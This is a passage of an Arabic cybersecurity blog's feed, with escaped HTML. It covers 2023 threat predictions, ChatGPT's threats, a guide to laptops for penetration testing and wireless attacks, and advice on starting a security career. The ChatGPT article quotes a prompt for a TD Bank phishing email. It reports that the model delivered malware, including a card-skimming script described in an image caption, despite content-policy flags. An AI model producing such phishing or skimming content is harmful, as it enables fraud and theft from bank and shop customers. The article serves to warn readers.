&lt;p&gt;في العام الجديد من الممكن أن يكون أي اختراق جديد لمنصات العملات المشفرة هو حجر الدومينو الأخير الذي يوقع جميع الأحجار الأخرى لتقويض مستقبل العملات الرقمية كبديل مالي قابل للتطبيق.&lt;/p&gt;
&lt;h3 id=&quot;اعتقال-مصادر-التهديدات-الداخلية&quot;&gt;اعتقال مصادر التهديدات الداخلية&lt;/h3&gt;
&lt;p&gt;من الصعب إثبات الجرائم الإلكترونية خاصة عندما يتم إجراؤها من قبل شخص من الداخل ولكن وفي العام الجديد يمكننا توقع المزيد من الاعتقالات للموظفين أو الأشخاص المطلعين من الداخل في مختلف الشركات والمؤسسات.&lt;/p&gt;
&lt;p&gt;الخطأ البشري هو أمر وارد، لنكن صريحين فهو أحد الأسباب الرئيسية للعديد من خروقات وتسريبات البيانات.&lt;/p&gt;
&lt;p&gt;تشمل التهديدات الداخلية العديد من الأمور وأخطرها التجسس والوصول المادي للموارد التي يصعب حمايتها.&lt;/p&gt;
&lt;p&gt;من المتوقع في هذا العام انتشار المزيد من الوعي التقني والبشري وبالتأكيد فإن الشركات المتضررة من التهديدات الداخلية ستبدأ باتباع تدابير أمنية شاملة تتضمن حماية جمع البيانات من خلال عمليات التحليل الجنائي الرقمي بالإضافة إلى تدابير عقابية صارمة ضد مصادر التهديد الداخلي.&lt;/p&gt;
&lt;h3 id=&quot;تزايد-التهديدات-الخاصة-بشبكات-5g-وواجهات-api&quot;&gt;تزايد التهديدات الخاصة بشبكات 5G وواجهات API&lt;/h3&gt;
&lt;p&gt;تزايد التهديدات على الأجهزة المحمولة والتطبيقات هو أمر مهم جداً لمستقبل الأمن السيبراني.&lt;/p&gt;
&lt;p&gt;أضافت شبكات الهاتف المحمول 5G بُعداً جديداً عالي السرعة لكل تهديد موجود، بالإضافة إلى الأتمتة والتكامل بين التطبيقات وتقنيات الحوسبة السحابية و كل ذلك يستلزم وجود نوع من واجهة برمجة التطبيقات API – Application Programming Interface وهذا يعني وجود أمر آخر يتم اختياره واستغلاله من قبل المهاجمين.&lt;/p&gt;
&lt;p&gt;يتطلب حماية هذه التقنيات بناء حلول برمجية آمنة ودمج الحماية عبر البنية التحتية للشبكات وصولاً إلى التطبيقات.&lt;/p&gt;
&lt;p&gt;بين تقنية الاتصال 5G وضعف معايير الأمن السيبراني لأجهزة انترنت الأشياء IoT وعالم API المتوسع باستمرار لن يمر وقت طويل قبل أن تؤدي الشروخ غير المعروفة إلى وقوع حدث أمني ضخم سيكون له تأثير وصدى كبير جداً ولهذا السبب فإن حماية واجهة برمجة التطبيقات API يعتبر أمر بالغ الأهمية.&lt;/p&gt;
&lt;h3 id=&quot;خروقات-كبيرة-وغرامات-كبيرة&quot;&gt;خروقات كبيرة وغرامات كبيرة&lt;/h3&gt;
&lt;p&gt;ستبدأ العملية عندما يتم اختراق مؤسسة ما مع ظهور قوانين جديدة للخصوصية بالإضافة إلى تدابير جديدة للامتثال وبالتالي ستكون القواعد أكثر صرامة وسيكون هناك غرامات مالية كبيرة لأي شركة يتم تسريب بيانات عملائها من خلال الخروقات وتسريبات البيانات.&lt;/p&gt;
&lt;h3 id=&quot;لن-يكون-لينكس-محصناً-ضد-الهجمات&quot;&gt;لن يكون لينكس محصناً ضد الهجمات&lt;/h3&gt;
&lt;p&gt;لا يعتبر خبراء الأمن السيبراني أن &lt;a href=&quot;https://blog.cyberpedia.site/difference-between-linux-distributions/&quot;&gt;أنظمة لينكس&lt;/a&gt; تمثل تهديداً صفرياً ولكن هذا النظام استفاد تاريخياً من الاستهداف المنخفض له ومن المتوقع أن تزداد الهجمات الخاصة على أنظمة لينكس في هذا العام.&lt;/p&gt;
&lt;h3 id=&quot;تزايد-الهجمات-التي-ترعاها-الدول&quot;&gt;تزايد الهجمات التي ترعاها الدول&lt;/h3&gt;
&lt;p&gt;تعتبر الحرب السيبرانية واحدة من أكثر أدوات الحرب الحديثة كفاءة وفعالية وكما شهدنا في عام 2022 فقد تحول الفضاء السيبراني لساحة معركة من أوراق الاعتماد المسربة وهجمات سلاسل التوريد والخروقات وفقدان الأسرار الصناعية إلى مهاجمة دول أخرى لأهداف استخباراتية أو جيوسياسية.&lt;/p&gt;
&lt;p&gt;لا يمكننا أبداً أن نتخلى عن حذرنا على الساحة العالمية عندما يتعلق الأمر بالإجراءات الاستباقية للتهديدات السيبرانية المتطورة وخاصة مع ازدياد عدد الدول التي تشارك حالياً في حروب إلكترونية ضد بعضها.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;تعتبر التنبؤات أمراً مضحكاً بالنسبة للعديد من الأشخاص ولكن هذا الأمر لا ينطبق على مجال الأمن السيبراني.&lt;/p&gt;
&lt;p&gt;لا يوجد شيء أسوأ من مواجهة موقف لا يكون لديك أي فكرة عنه أو كيفية التعامل مع هجوم محتمل أو اكتشاف أن فريق الحماية لديك كان بإمكانه منع هذه المواقف باستخدام أدوات وخدمات وممارسات أفضل للأمن السيبراني.&lt;/p&gt;
&lt;p&gt;هذا هو سبب أهمية هذه التنبؤات لعام 2023 رغم أنها قد لا تكون مثالية ولكنها تساعد على التخطيط بعناية لوضعنا الأمني والاستعداد لمواجهة بعض أكثر الجهات الفاعلة السيئة والعقول الإجرامية في الفضاء الإلكتروني وقد تساعد هذه التنبؤات في وضع إطار عمل لكيفية الاستعداد للتهديدات المحتملة في العام الجديد.&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>توقعات الأمن السيبراني</category><category>برمجيات الفدية</category><category>الثقة الصفرية</category><category>أمن API</category><category>التهديدات الداخلية</category><category>الحرب السيبرانية</category></item><item><title>Chat GPT وتهديداته على الواقع الحالي</title><link>https://blog.cyberpedia.site/chatgpt-threats/</link><guid isPermaLink="true">https://blog.cyberpedia.site/chatgpt-threats/</guid><description>ما هو Chat GPT وكيف تم تدريبه وما الذي يميزه، ولماذا يُعد تهديداً لمحرك بحث Google، وكيف يمكن إساءة استخدامه في كتابة رسائل التصيد والبرامج الضارة.</description><pubDate>Thu, 22 Dec 2022 11:54:03 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Chat GPT روبوت دردشة من OpenAI مبني على GPT-3، يولّد ردوداً شبيهة بالبشر في الوقت الفعلي ووصل إلى مليون مستخدم في أقل من أسبوع. يهدد Google لأنه يقدم إجابة واحدة فورية بدل قائمة روابط، لكن خطره الأكبر في إساءة استخدامه لكتابة رسائل تصيد خالية من الأخطاء وإنتاج برامج ضارة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;استحوذ برنامج chatbot جديد يسمى &lt;strong&gt;&lt;a href=&quot;http://chat.openai.com/&quot;&gt;Chat GPT&lt;/a&gt;&lt;/strong&gt; على الإنترنت تاركاً الكثيرين ممن يستخدمونه في حالة صدمة بسبب تألقه.&lt;/p&gt;
&lt;p&gt;أصدرت شركة &lt;strong&gt;&lt;a href=&quot;https://openai.com&quot;&gt;OpenAI&lt;/a&gt;&lt;/strong&gt; برنامج ChatGPT وهو نموذجها الأولي لروبوت الدردشة المدعوم بالذكاء الاصطناعي والذي اكتسب الكثير من الزخم بين الجمهور لإجاباته التفصيلية الشبيهة بالإنسان على الاستفسارات.&lt;/p&gt;
&lt;p&gt;بحسب الرئيس التنفيذي سام التمان وصل البرنامج إلى علامة المليون مستخدم بعد أقل من أسبوع من إطلاقه.&lt;/p&gt;
&lt;p&gt;يعد Chat GPT أو نماذج المحولات المدربة مسبقاً المستندة إلى الدردشة، نوعاً من الذكاء الاصطناعي الذي يسمح للمستخدمين بالتفاعل مع مساعد افتراضي باستخدام لغة طبيعية.&lt;/p&gt;
&lt;p&gt;تعتمد هذه التقنية على مبادئ GPT-3، الجيل الثالث من نموذج المحولات التوليدية الشهيرة المدربة مسبقاً.&lt;/p&gt;
&lt;p&gt;تتمثل إحدى الميزات الرئيسية لدردشة GPT في قدرتها على إنشاء ردود في الوقت الفعلي، بناءً على مدخلات المستخدم.&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-مقدرات-chat-gpt&quot;&gt;ما هي مقدرات Chat GPT؟&lt;/h2&gt;
&lt;p&gt;تتضمن بعض التطبيقات المحتملة للدردشة Chat GPT خدمة العملاء والدعم والتعليم والتدريب والمساعدين الشخصيين.&lt;/p&gt;
&lt;p&gt;مع ذلك، هناك أيضاً مخاوف بشأن الآثار المحتملة لهذه التكنولوجيا مثل فقدان الوظائف وتقليل التفاعل البشري.&lt;/p&gt;
&lt;h2 id=&quot;كيف-تم-تدريب-chat-gpt&quot;&gt;كيف تم تدريب Chat GPT؟&lt;/h2&gt;
&lt;p&gt;تم تدريب Chat GPT على بحر من النصوص الرقمية المستخرجة من الإنترنت, وعندما اختبر الناس هذا النظام طلب منهم تقييم ردوده.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open AI&lt;/strong&gt; الشركة التي تقف وراء Chat GPT، تجري أبحاثاً في مجال الذكاء الاصطناعي بهدف معلن وهو تعزيز وتطوير الذكاء الاصطناعي الودود بطريقة تفيد البشرية ككل.&lt;/p&gt;
&lt;h2 id=&quot;ما-الذي-يميز-chat-gpt&quot;&gt;ما الذي يميز Chat GPT؟&lt;/h2&gt;
&lt;p&gt;ما يميز GPT عن تقنيات chatbot الأخرى هو قدرتها على إنشاء ردود في الوقت الفعلي بناءً على مدخلات المستخدم ويتيح ذلك إجراء محادثة أكثر طبيعية وانسيابية، حيث يمكنه فهم مجموعة واسعة من الأسئلة والبيانات والرد عليها.&lt;/p&gt;
&lt;p&gt;على الرغم من الفوائد المحتملة لـ Chat GPT، هناك أيضاً مخاوف بشأن آثارها&lt;/p&gt;
&lt;p&gt;يجادل بعض النقاد بأن استخدام الدردشة GPT قد يؤدي إلى فقدان الوظائف وتقليل التفاعل البشري، مما قد يضر بالروابط والعلاقات الاجتماعية.&lt;/p&gt;
&lt;h2 id=&quot;لماذا-يمثل-chat-gpt-تهديداً-لـ-google&quot;&gt;لماذا يمثل Chat GPT تهديداً لـ Google؟&lt;/h2&gt;
&lt;p&gt;قد تكون أكبر فائدة لـ Chat GPT هي كارثة مالية لـ Google من خلال توفير إجابات فائقة على الاستفسارات التي نضعها حالياً في أقوى محرك بحث في العالم.&lt;/p&gt;
&lt;p&gt;يعمل Google عن طريق الزحف إلى مليارات من صفحات الويب وفهرسة هذا المحتوى ثم ترتيبه حسب الإجابات الأكثر صلة ثم ينشر قائمة من الروابط للنقر عليها.&lt;/p&gt;
&lt;p&gt;يقدم Chat GPT شيئاً أكثر إثارة لمستخدمي الإنترنت المتعثرين: إجابة واحدة تعتمد على بحثها الخاص وتوليفها لتلك المعلومات.&lt;/p&gt;
&lt;p&gt;تم تدريب Chat GPT على ملايين المواقع الإلكترونية ليس فقط لاكتساب مهارة إجراء محادثة شبيهة بالبشر ولكن المعلومات نفسها، طالما تم نشرها على الإنترنت قبل أواخر عام 2021.&lt;/p&gt;
&lt;p&gt;يوفر Chat GPT أيضاً استجابة واحدة وفورية لا تتطلب مزيداً من البحث عن مواقع الويب الأخرى.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ماذا سيكون مستقبل Google ووظائفنا والعالم بأسره؟ ما السعر الذي نحن على وشك دفعه مقابل التوافر الشامل للذكاء الاصطناعي في متناول الجميع؟&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;يمكن-لـ-chat-gpt-كتابة-رسائل-البريد-الإلكتروني-المخادعة-دون-أخطاء&quot;&gt;يمكن لـ Chat GPT كتابة رسائل البريد الإلكتروني المخادعة دون أخطاء؟&lt;/h2&gt;
&lt;p&gt;يعد التهجئة الضعيفة والقواعد المربكة من بين السمات الأكثر دلالة في رسائل البريد الإلكتروني الاحتيالية.&lt;/p&gt;
&lt;p&gt;يقترح البعض أن هذا قد يكون هو الحال لأن رسائل البريد الإلكتروني هذه تأتي من مناطق لا تكون اللغة الإنجليزية هي اللغة الأم للجهات المنفذة للتهديد&lt;/p&gt;
&lt;p&gt;تخمن نظريات أخرى أن الأخطاء الإملائية يمكن تقديمها عن قصد من قبل مرسلي البريد العشوائي على أمل تجنب مرشحات البريد العشوائي&lt;/p&gt;
&lt;p&gt;ليس لدينا إجابة موثوقة حتى الآن.&lt;/p&gt;
&lt;p&gt;ما نعرفه هو أن Open GPT يجعل المهمة أسهل بكثير.&lt;/p&gt;
&lt;p&gt;إليك كيفية استجابة هذا الإحساس سريع الذكاء، “اكتب رسالة بريد إلكتروني تصيد يبدو أنها واردة من بنك TD”.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;رسم توضيحي لرسالة تصيد كتبها Chat GPT تنتحل صفة بنك: لغة سليمة ونبرة عاجلة ورابط إلى صفحة دخول مزيفة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.B1-UYgeU_1bdCOA.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“اكتب رسالة بريد إلكتروني تصيد يبدو أنها واردة من بنك TD”.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;طرحنا مجموعة من المطالب على Chat GPT لإنتاج برامج ضارة خطيرة, تم الإبلاغ عن بعض هذه الطلبات فقط بسبب انتهاك سياسة المحتوى وفي كلتا الحالتين، امتثلت Chat GPT للمتطلبات وقامت بتسليم المحتوى.&lt;/p&gt;
&lt;p&gt;نحن مقتنعون بالنسبة لأولئك الذين يطرحون الأسئلة الصحيحة بشكل خبيث يمكن أن يتحول Chat GPT إلى &lt;strong&gt;“ترسانة شيطانية من الأسلحة السيبرانية”.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;رسم توضيحي لاستجابة Chat GPT لطلب كتابة سكربت خبيث يستهدف بيانات بطاقات الدفع في صفحات الويب ويرسلها إلى خادم المهاجم&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-04.CmbjlwBh_rEHa2.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;البرامج الضارة&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;نحن في &lt;strong&gt;&lt;a href=&quot;https://blog.cyberpedia.site/&quot;&gt;تريندتك&lt;/a&gt;&lt;/strong&gt; نؤمن بأن توفير أدوات مبنية على الذكاء الاصطناعي ستقوم بمساعدت جميع المستخدمين الذين يطمحون للحصول على إجابات لأسئلتهم العالقة &lt;strong&gt;“لكن”&lt;/strong&gt; تكمن خطورة هذه الأدوات وغيرها نتيجة الإستخدام الخاطئ أو الغير شرعي.&lt;/p&gt;
&lt;p&gt;نتمنى من جميع المتابعين أن يحافظوا على سلامتهم واحترام خصوصية الآخرين من خلال استخدام هذه الأدوات أو غيرها لأهداف علمية أو تدريبية مفيدة.&lt;/p&gt;
</content:encoded><category>الذكاء الاصطناعي والتقنية</category><category>ChatGPT</category><category>الذكاء الاصطناعي</category><category>OpenAI</category><category>التصيد الاحتيالي</category><category>البرامج الضارة</category></item><item><title>أفضل لابتوب لمجال الأمن السيبراني والاختراق</title><link>https://blog.cyberpedia.site/best-laptop-for-cyber-security/</link><guid isPermaLink="true">https://blog.cyberpedia.site/best-laptop-for-cyber-security/</guid><description>ما المواصفات التي تحتاجها فعلاً في لابتوب للأمن السيبراني والاختراق: دور المعالج وذاكرة RAM وكرت الشبكة اللاسلكية، وكيف تجهز بيئة اختبار آمنة بجهاز قديم.</description><pubDate>Mon, 12 Dec 2022 18:12:09 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;لا تحتاج إلى أحدث لابتوب لتبدأ في الأمن السيبراني، فالمجال يعتمد على المهارات بنسبة 80% وعلى الجهاز بنسبة 20%. استثمر في ذاكرة RAM (الحد الأدنى 4 GB وقد تصل إلى 32 GB للمحترفين) أكثر من المعالج، واستخدم كرت شبكة لاسلكية خارجياً مثل Alfa يدعم monitor mode وحقن الحزم، ويكفي جهاز قديم لتشغيل Kali أو Parrot.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;السؤال الذي يُطرح بشكل متكرر ويراود كل شخص يريد أن يبدأ في مجال &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ما هو أفضل لابتوب لمجال الأمن السيبراني؟&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ما هو أفضل لابتوب للاختراق؟&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;بشكل شخصي تلقيت هذا السؤال عشرات المرات لذا دعنا نحاول معالجة هذا الأمر ولنقدم لك بعض الأفكار والنصائح قبل أن تقوم بشراء جهاز لتبدأ حياتك المهنية في مجال الأمن السيبراني.&lt;/p&gt;
&lt;p&gt;(للتعرف على كل ما هو جديد في مجال الأمن السيبراني تابع قناتنا على &lt;a href=&quot;https://t.me/cyber_fu&quot;&gt;التلغرام&lt;/a&gt;)&lt;/p&gt;
&lt;h2 id=&quot;الاعتقاد-الخاطئ&quot;&gt;الاعتقاد الخاطئ&lt;/h2&gt;
&lt;p&gt;في البداية وقبل الإجابة على هذا السؤال دعني كالعادة أن ابدأ بنسف الاعتقاد الخاطئ حول هذا الأمر&lt;/p&gt;
&lt;p&gt;يعتقد الكثير من الأشخاص أنهم بحاجة إلى أحدث لابتوب/ كمبيوتر محمول لينجحوا في هذا المجال وبالتأكيد هذا الاعتقاد خاطئ&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;الأمن السيبراني أو الاختراق يركز على طريقة التفكير والمعرفة والمهارات بنسبة 80% وعلى الجهاز بنسبة 20%&lt;/p&gt;
&lt;p&gt;الأمر هنا مختلف عن الألعاب التي تحتاج لمواصفات عالية ككرت الشاشة وذاكرة الوصول العشوائي RAM&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;نحن كمحترفين في مجال الأمن السيبراني تطبيقاتنا بشكل عام بسيطة نسبياً وبالتالي لا نحتاج في عملنا لأحدث جهاز أو أقوى المواصفات&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;الأمر المهم هو أن تبدأ حتى ولو بجهاز قديم&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;عندما بدأت في هذا المجال (في عام 2013) كنت امتلك جهاز بمواصفات عادية وكنت أطبع الكتب بشكل ورقي لأتمكن من دراستها ولكنني بدأت ولم اخلق اعذاراً والآن لدي أكثر من جهاز من أعلى المواصفات&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;ما أود قوله:&lt;/p&gt;
&lt;p&gt;إذا كنت لا تستطيع شراء أحدث وأفضل جهاز فمن الممكن كبداية أن تشتري جهاز مستعمل ورخيص والمهم أن تبدأ التعلم والعمل بدلاً من أن تنتظر حصولك على الجهاز المثالي، ما عليك فعله الآن هو تطوير مهاراتك والتي هي 80% من هذا المجال&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;في مجال الأمن السيبراني نحن نعتمد وبشكل كبير على نظام التشغيل لينكس والذي يعتبر خفيف نسبياً بالمقارنة مع نظام الويندوز بالإضافة إلى أن معظم الأدوات التي نستخدمها هي عبارة عن سكريبتات أو أكواد برمجية بسيطة لا تتطلب الكثير من المصادر لذا دعونا نتفق على أنك لست بحاجة لشراء جهاز باهظ الثمن لتبدأ في مجال الأمن السيبراني&lt;/p&gt;
&lt;p&gt;إذاً ما هو أفضل لابتوب لمجال الأمن السيبراني؟&lt;/p&gt;
&lt;h2 id=&quot;مواصفات-الجهاز-المناسب-لمجال-الأمن-السيبراني&quot;&gt;مواصفات الجهاز المناسب لمجال الأمن السيبراني&lt;/h2&gt;
&lt;p&gt;ما نحتاجه بالفعل هو المعالج أو وحدة المعالجة المركزية CPU والتي تعتبر دماغ الجهاز ولا يهم بالنسبة لنا إن كان المعالج Intel or AMD المهم كيف يعمل وليس المهم السرعة، كلما زادت سرعة المعالج كلما زاد السعر وبالتأكيد يمكنك استخدام جهاز بمعالج ليس سريعاً جداً وبسعر أرخص مع أداء مقبول&lt;/p&gt;
&lt;p&gt;المعالج ليس مهم جداً في معظم التطبيقات التي نستخدمها في مجال الأمن السيبراني أو الاختراق باستثناء بعض الأمور مثل هجمات القوة الغاشمة لكسر كلمات السر أو الهاش الخاص بها وخاصة إذا كانت كلمة السر معقدة فلن يتمكن معالجك من الوصول لها، في مثل هذا السيناريو يمكنك الاستفادة من خدمات الحوسبة السحابية للحصول على نظام بمواصفات عالية للمعالج وبشكل مؤقت وبتكلفة قليلة&lt;/p&gt;
&lt;p&gt;ما نحتاجه في هذا المجال هو ذاكرة الوصول العشوائي RAM لأننا سنكون بحاجة لتشغيل عمليات وتطبيقات متعددة في نفس الوقت وفي بعض الأحيان نقوم بتشغيل أكثر من نظام افتراضي VM – Virtual machine في نفس الوقت وبالتالي كلما زادت ذاكرة الوصول العشوائي RAM لديك قلت المشاكل التي سوف تواجهها وستكون الأمور أكثر سلاسة لديك&lt;/p&gt;
&lt;h2 id=&quot;ما-مقدار-ذاكرة-ram-المطلوبة&quot;&gt;ما مقدار ذاكرة RAM المطلوبة؟&lt;/h2&gt;
&lt;p&gt;الحد الأدنى هو RAM 4 GB وكلما كنت محترفاً فإن عملك سيحتاج إلى ذاكرة RAM إضافية والتي قد تصل إلى RAM 32 GB وبالتأكيد سيكون هذا الأمر أكثر تكلفة ولهذا السبب إذا كنت تريد أن تنفق أموالك في المكان الصحيح فاستثمر هذا المبلغ للحصول على ذاكرة RAM أكبر.&lt;/p&gt;
&lt;h2 id=&quot;كرت-الشبكة-اللاسلكية&quot;&gt;كرت الشبكة اللاسلكية&lt;/h2&gt;
&lt;p&gt;بالتأكيد سوف تقوم بهجمات خاصة على الشبكات اللاسلكية (الأمر المحبب لدى الجميع) وبالتالي ستحتاج لاستثمار قليلاً في كرت الشبكة اللاسلكية والذي يجب أن يدعم بعض الأمور الإضافية مثل العمل في نمط المراقبة monitor mode وأن يدعم آلية حقن حزم البيانات في الوسط المحيط (ستحتاج هذا الأمر لتنفيذ العديد من الهجمات)&lt;/p&gt;
&lt;p&gt;الأداة الأكثر شهرة للقيام بهجمات كسر كلمة السر الخاصة بالشبكات اللاسلكية هي aircrack-ng يمكنك الاطلاع على الشرائح المتوافقة مع هذه الأداة من &lt;a href=&quot;https://www.aircrack-ng.org/doku.php?id=compatibility_drivers&quot;&gt;الموقع الرسمي&lt;/a&gt; لهذه الأداة&lt;/p&gt;
&lt;p&gt;معظم الأشخاص لا يعرفون ما هي الشرائح chipset الموجودة ضمن كرت الشبكة في جهازهم لذلك وببساطة يمكنك استخدام كرت شبكة لاسلكية خارجي من نوع Alfa wifi adapter والذي يدعم كل هذه الميزات المطلوبة بشكل تلقائي&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;كرت شبكة لاسلكية خارجي يتصل عبر USB ويدعم نمط المراقبة وحقن الحزم ويتوافق مع أداة aircrack-ng&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.DvBIS9st_ZNfvm5.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Alfa wifi adapter&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;إعداد-بيئة-اختبار-آمنة&quot;&gt;إعداد بيئة اختبار آمنة&lt;/h2&gt;
&lt;p&gt;يمكنك تنصيب نظام التشغيل كالي لينكس ضمن VM مع RAM 2 GB فقط وهي كافية لعمل هذا النظام بشكل جيد مع تخصيص RAM 1 GB للنظام الذي يحوي على ثغرات وهو نظام &lt;a href=&quot;https://sourceforge.net/projects/metasploitable/files/Metasploitable2/&quot;&gt;metasploitable2&lt;/a&gt; وهذه البيئة تسمح لك باختبار معظم أدوات اختبار الاختراق الخاصة بالأنظمة والخاصة بتطبيقات الويب ضمن بيئة تجريبية آمنة&lt;/p&gt;
&lt;p&gt;إليك هذه الدورة المجانية التي تشرح طريقة إعداد هذه البيئة “&lt;a href=&quot;https://cyberpedia.site/course/kali-linux/&quot;&gt;دليل تنصيب كالي لينكس&lt;/a&gt;”&lt;/p&gt;
&lt;p&gt;كما يمكنك استخدام نظام التشغيل Parrot بدلاً من الكالي والذي يعمل بمصادر أقل من الكالي ولكن إن كنت مبتدأ في هذا المجال أنصحك بأن تستخدم الكالي لكونه أكثر شهرة ومدعوم من مجتمع اكبر وبالتالي ستجد إجابات عن كل الأسئلة والمشاكل التي ستواجهك بشكل أسرع&lt;/p&gt;
&lt;p&gt;كلا النظامين Kali and Parrot مبنيان على توزيعة ديبيان وفي حال اتقانك للأساسيات ستكون قادر على التعامل مع أي &lt;a href=&quot;https://blog.cyberpedia.site/difference-between-linux-distributions/&quot;&gt;توزيعة&lt;/a&gt; من نظام لينكس&lt;/p&gt;
&lt;p&gt;يمكنك ان تبدأ في هذا المجال بجهاز قديم وحتى لو كان بذاكرة RAM 2 GB فقط أو أقل من خلال تنصيب نظام Kali or Parrot كنظام أساسي وبالتالي الاستفادة من كامل مصادر النظام&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;توقف عن طرح الأسئلة الكثيرة وابدأ الآن وتعلم المهارات المطلوبة والتي هي 80% من هذا المجال بالمقابل فإن الجهاز هو 20% فقط&lt;/p&gt;
&lt;p&gt;يمكنك تعلم كل المهارات المطلوبة لتبدأ في مجال الأمن السيبراني من خلال هذه &lt;a href=&quot;https://cyberpedia.site/course/cyber-ops/&quot;&gt;الدورة&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;يمكنك التواصل معنا عبر الفيسبوك “&lt;a href=&quot;https://facebook.com/jameltawelh&quot;&gt;المهندس جميل حسين طويله&lt;/a&gt;” للحصول على المزيد من النصائح والتدريب في هذا المجال&lt;/p&gt;
</content:encoded><category>اختبار الاختراق</category><category>لابتوب للأمن السيبراني</category><category>ذاكرة RAM</category><category>كالي لينكس</category><category>Alfa wifi adapter</category><category>بيئة اختبار الاختراق</category></item><item><title>كيف أبدأ في مجال الأمن السيبراني</title><link>https://blog.cyberpedia.site/how-to-start-in-cyber-security/</link><guid isPermaLink="true">https://blog.cyberpedia.site/how-to-start-in-cyber-security/</guid><description>هل تحتاج إلى شهادة تقنية لتبدأ في الأمن السيبراني؟ تعرّف على الأساسيات التي تتعلمها أولاً: الشبكات وأنظمة التشغيل والحماية والويب والبرمجة.</description><pubDate>Mon, 05 Dec 2022 11:02:20 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;لا تحتاج إلى شهادة في الأمن السيبراني أو علوم الكمبيوتر لتبدأ في هذا المجال، فكثير من المختصين جاؤوا من خلفيات غير تقنية. ابدأ بالأساسيات: شبكات الحاسب، وأنظمة التشغيل وخاصة لينكس عبر سطر الأوامر، وأساسيات الحماية، وآلية عمل الويب وبروتوكول HTTP، ثم البرمجة بلغة بسيطة مثل Python، وامنح نفسك وقتاً قبل اختيار التخصص.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;من منا لم يسأل هذا السؤال: كيف ابدأ في مجال &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; وكيف احصل على عمل في هذا المجال؟&lt;/p&gt;
&lt;p&gt;نظراً لأن المنظمات والحكومات في جميع أنحاء العالم معرضة بشكل متزايد للتهديدات السيبرانية ومع ازدياد حوادث الاختراق وتسريب المعلومات يزداد الطلب بشكل يومي على المختصين في مجال الأمن السيبراني بالإضافة لوجود طلب متزايد على تدريب الأشخاص في هذا المجال للمساعدة في الدفاع ضد هذا التهديد المتزايد&lt;/p&gt;
&lt;p&gt;الأمن السيبراني هو مجال سريع الخطى وديناميكي للغاية مع مجموعة واسعة من التخصصات الفرعية، مما يتيح لك العمل في أي مكان في العالم تقريباً، مع ميزات وعوائد مالية جيدة وفرص لإحداث فرق حقيقي وملموس (للتعرف على كل ما هو جديد في مجال الأمن السيبراني تابع قناتنا على &lt;a href=&quot;https://t.me/cyber_fu&quot;&gt;التلغرام&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;هل فكرت في العمل كمحترف في مجال الأمن السيبراني و لكنك لست متأكد فيما إذا كانت لديك الخلفية اللازمة لتتمكن من النجاح في هذا التخصص؟&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;لا تقلل من قيمتك وكن واثقاً من نفسك ومن قدراتك&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;ولكن ألا أحتاج إلى شهادة في الأمن السيبراني أو في علوم الكمبيوتر؟&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;الإجابة المختصرة: “لا”&lt;/p&gt;
&lt;p&gt;يوجد العديد من أشهر المتخصصين في مجال الأمن السيبراني الذين أعرفهم من خلفيات غير تقنية ومعظمهم قد درس وحصل على شهادات غير تقنية مثل اللغة الإنجليزية أو الطب أو علم النفس أو حتى خلفيات في مجالات مثل الهندسة الميكانيكية&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;تماماً مثل المقولة الشهيرة “يمكن لأي شخص الطهي” كذلك يمكن لأي شخص أن يبدأ في مجال الأمن السيبراني&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;عند الحديث عن مسيرتك وتاريخك الحافل بالمعارك من أجل الحصول على عمل يحقق لك الدخل المطلوب يمكنك التفكير أيضاً بالحصول على فرصة عمل في مجال الأمن السيبراني حتى لو كنت من خلفية غير تقنية&lt;/p&gt;
